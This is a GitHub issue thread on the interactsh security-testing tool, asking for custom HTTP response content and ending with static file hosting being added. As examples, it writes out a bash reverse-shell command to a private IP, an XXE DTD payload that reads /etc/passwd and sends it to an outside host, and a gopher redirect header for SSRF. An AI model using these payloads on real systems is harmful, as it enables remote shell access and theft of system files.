### ISSUE TITLE
Add custom response content

### ISSUE THREAD

**Issue by Y4er** [projectdiscovery/interactsh#29]
custom url for somthing content. like:

request url: http://interactsh.sh/bash get response : `sh -i >& /dev/tcp/10.10.10.10/9001 0>&1`

**Comment by ehsandeep** [comment]
@Y4er Can you also list down few uses and more possible custom responses?

**Comment by geeknik** [comment]
Could we add something so that if we get a request for `interactsh-server/file.dtd`, it will return a payload like so:

```
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://example.com/?p=%file;'>" >
```

**Comment by shelld3v** [comment]
Not just response content, I think response headers are also useful. Something like `Location: gopher://127.0.0.1`

**Comment by ehsandeep** [comment]
Possible support implementation - https://github.com/projectdiscovery/simplehttpserver#running-tcp-server-with-custom-responses

**Comment by Mzack9999** [comment]
Adding an internal scripting engine with a user-defined callback would probably address all use cases (e.g., xxe, ssrf with a custom redirect, etc.)

**Comment by Mzack9999** [comment]
Blocked by https://github.com/projectdiscovery/nebula/issues/4

**Comment by ehsandeep** [comment]
@Y4er @geeknik [static file hosting](https://github.com/projectdiscovery/interactsh#static-file-hosting) is now supported in the latest version of the project with https://github.com/projectdiscovery/interactsh/pull/332
